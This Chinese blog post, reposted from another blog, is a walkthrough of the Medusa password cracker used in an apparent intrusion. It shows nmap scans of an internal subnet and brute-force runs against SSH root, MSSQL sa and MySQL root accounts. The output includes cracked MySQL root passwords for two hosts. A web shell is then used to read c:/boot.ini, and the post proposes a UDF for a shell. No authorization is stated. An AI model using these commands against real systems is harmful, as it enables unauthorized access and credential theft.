精灵's blog

medusa 2.0 – linux下的经典密码破解工具

作者：精灵 发布时间：2010-06-30 10:02. 分类： 技术相关

转自dangdang’s blog

渗透linux环境的网络，口令破解是必不可少的。接下来介绍一款优秀的口令破解工具，首先先下载破解工具：

wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz 或者curl -O http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz

如果没有libssh2就装个http://www.libssh2.org/download/libssh2-1.2.6.tar.gz

如果装错了就make uninstall再重装个，装完rm -rf libssh2-1.2.2，下面是安装方法：

tar zxvf medusa-2.0.tar.gz

cd medusa-2.0

./configure

看看ssh在里面没->enable_module_ssh，没有的话编译是没有ssh模块的

./make

./make install

要是ubuntu,就sudo apt-get install libssh2，要是linux就像上面这么麻烦了。

装好后用medusa -d查看各个模块是否正常，经常会现如下错误：

+ ssh.mod : Couldn’t load “/usr/local/lib/medusa/modules/ssh.mod” [libssh2.so.1: cannot open shared object file: No such file or directory

虽然已安装了libssh但是找不到ssh路径，这需要我们手工添加一个。etc 目录 下面有一个 叫 ld.so.conf 的文件，指明 so 文件默认路径 ，一般的是 lib 和 usr lib ，编译出来的装在 usr local lib下了，所以要加一个，然后运行ldconfig，操作如下：

cat /etc/ls.do.conf
cat /etc/ld.so.conf
include ld.so.conf.d/*.conf
ls ld.so.conf.d/

echo /usr/local/lib > /etc/ld.so.conf.d/local.conf
cat /etc/ld.so.conf.d/*
/usr/local/lib
/usr/lib/mysql
/usr/lib/qt-3.3/lib
ls -l /usr/local/lib/libssh*
-rw-r--r-- 1 root root 752936 06-25 14:33 /usr/local/lib/libssh2.a
-rwxr-xr-x 1 root root 827 06-25 14:33 /usr/local/lib/libssh2.la
lrwxrwxrwx 1 root root 16 06-25 14:33 /usr/local/lib/libssh2.so -> libssh2.s
o.1.0.1
lrwxrwxrwx 1 root root 16 06-25 14:33 /usr/local/lib/libssh2.so.1 -> libssh2
.so.1.0.1
-rwxr-xr-x 1 root root 494064 06-25 14:33 /usr/local/lib/libssh2.so.1.0.1

ldconfig

最后再查询一下有没有ldd /usr/local/lib/medusa/modules/ssh.mod

配置好了路径后，再用-d看看ssh模块是否正常了。接下来就是medusa具体用法了：

# medusa
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a
different parameter each time and they will all be sent to the module (i.e.
-m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process
the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module’s usage information
-v [NUM] : Verbose level [0 - 6 (more)]
-w [NUM] : Error debug level [0 - 10 (more)]
-V : Display version
-Z [NUM] : Resume scan from host #

我们再看看medusa有哪些模块支持什么功能的破解：

# medusa -d
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

Available modules in “.” :

Available modules in “/usr/local/lib/medusa/modules” :
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.0
+ http.mod : Brute force module for HTTP : version 2.0
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.0
+ ssh.mod : Brute force module for SSH v2 sessions : version 2.0
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.0
+ web-form.mod : Brute force module for web forms : version 2.0
+ wrapper.mod : Generic Wrapper Module : version 2.0

支持的破解项目还是非常全面的，非常有利于渗透。首先我们确定目标，扫描开放ssh的机器，随便找个段扫描一下吧。扫描整个段开了22端口的机器， 并且判断服务版本，保存到ssh文件中：

nmap -sV -p22 -oG ssh 172.20.3.0/24

Interesting ports on 172.20.3.132:
PORT STATE SERVICE VERSION
22/tcp filtered ssh
MAC Address: 00:1E:4F:16:B9:DB (Unknown)

Interesting ports on 172.20.3.133:
PORT STATE SERVICE VERSION
22/tcp filtered ssh
MAC Address: 00:1E:4F:13:09:E5 (Unknown)

Interesting ports on 172.20.3.134:
PORT STATE SERVICE VERSION
22/tcp filtered ssh
MAC Address: 00:1E:4F:13:72:49 (Unknown)

………………

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
MAC Address: 00:26:B9:5E:77:7A (Unknown)

Interesting ports on 172.20.3.148:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
MAC Address: 00:26:B9:5E:79:D0 (Unknown)

Interesting ports on 172.20.3.150:
PORT STATE SERVICE VERSION
22/tcp closed ssh
MAC Address: 00:1E:4F:16:B8:2F (Unknown)

Interesting ports on 172.20.3.151:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
MAC Address: 00:1E:4F:16:B9:EF (Unknown)

Interesting ports on 172.20.3.152:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
MAC Address: 00:1A:A0:1C:0B:C2 (Unknown)

Interesting ports on 172.20.3.254:
PORT STATE SERVICE VERSION
22/tcp filtered ssh
MAC Address: 00:10:DB:FF:22:E0 (Juniper Networks)

Nmap finished: 256 IP addresses (64 hosts up) scanned in 33.634 seconds
cat ssh
# Nmap 4.11 scan initiated Fri Jun 25 15:25:50 2010 as: nmap -sV -p22 -oG ssh 17
2.20.3.0/24
Host: 172.20.3.12 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.13 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.16 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.19 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.28 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.55 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.58 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.61 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.62 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.63 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.64 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.67 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.70 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.71 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.72 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.73 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.74 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.75 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.76 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.77 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.78 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.79 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.80 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.81 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.82 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.83 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.84 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.85 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.88 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.91 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.94 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.97 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.110 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.111 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.112 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.113 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.114 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.117 (ygxy1) Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2
.0)/
Host: 172.20.3.118 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.119 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.121 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.123 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.124 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.125 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.126 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.128 () Ports: 22/filtered/tcp//ssh///
Host: 172.20.3.129 () Ports: 22/filtered/tcp//ssh///
Host: 172.20.3.130 () Ports: 22/filtered/tcp//ssh///
Host: 172.20.3.132 () Ports: 22/filtered/tcp//ssh///
Host: 172.20.3.133 () Ports: 22/filtered/tcp//ssh///
Host: 172.20.3.134 () Ports: 22/filtered/tcp//ssh///
Host: 172.20.3.135 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.136 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.141 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.142 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.143 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.145 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.146 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.147 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.148 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.150 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.151 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.152 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.254 () Ports: 22/filtered/tcp//ssh///
# Nmap run completed at Fri Jun 25 15:26:24 2010 — 256 IP addresses (64 hosts up) scanned in 33.634 seconds

类似这样的，这里我们要整理一下，把开了ssh的IP整理出来，现在明白oG保存的意义所在了

grep 22/open ssh | cut -d ” ” -f 2 >>ssh1.txt

cat ssh1.txt

172.20.3.28
172.20.3.61
172.20.3.62
172.20.3.63
172.20.3.64
172.20.3.67
172.20.3.70
172.20.3.71
172.20.3.72
172.20.3.73
172.20.3.74
172.20.3.75
172.20.3.76
172.20.3.77
172.20.3.78
172.20.3.79
172.20.3.80
172.20.3.81
172.20.3.82
172.20.3.83
172.20.3.84
172.20.3.85
172.20.3.88
172.20.3.97
172.20.3.112
172.20.3.113
172.20.3.114
172.20.3.117
172.20.3.118
172.20.3.125
172.20.3.126
172.20.3.136
172.20.3.141
172.20.3.142
172.20.3.143
172.20.3.147
172.20.3.148
172.20.3.151
172.20.3.152

加载ssh模块进行ssh破解
medusa -H ssh1.txt -u root -P p.txt -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: aaaaaa (1 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 1 (6 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 11 (7 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 111 (8 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 1111 (9 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 11111 (10 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 123 (11 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 1234 (12 of 51 complete)
………………
破解需要漫长的等待，ssh破解并不快，建议字典包含十几个到100个以内的常见密码就可以了，否则跑的时间比较长。或者配置-G 、-T提高些一些破解速度。

推荐还是扫一扫sql…

nmap -sV -oG mssql 172.20.0-5.1-254 -p1433 //扫描172.20.0.1-172.20.5.254

grep 1433/open mssql | cut -d ” ” -f 2 >>mssql.txt

medusa -H mssql.txt -u sa -P mssql_pass.dic -M mssql

没有破出来，再试试破mysql：

# medusa -H mysql.txt -u root -P p.txt -M mysql -O pass.log //结果输出到pass.log

cat pass.log
# Medusa v.2.0 (2010-06-26 10:42:32)
# medusa -H mysql.txt -u root -P p.txt -M mysql -O pass.log
ACCOUNT FOUND: [mysql] Host: 172.20.1.115 User: root Password: 12345678 [SUCCESS]
ACCOUNT FOUND: [mysql] Host: 172.20.3.58 User: root Password: mysql [SUCCESS]
# Medusa has finished (2010-06-26 10:55:11).

运气还不错，接着利用jspshell连上172.20.1.115的mysql操作：
select load_file(‘c:/boot.ini’);

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(2)\WINDOWS=”Windows Server 2003, Enterprise” /fastdetect /NoExecute=OptIn

原来是win2k3，可以继续写入个udf获得shell…

最后附上官方说明：http://www.foofus.net/~jmk/medusa/ChangeLog

Tags: 密码破解 , linux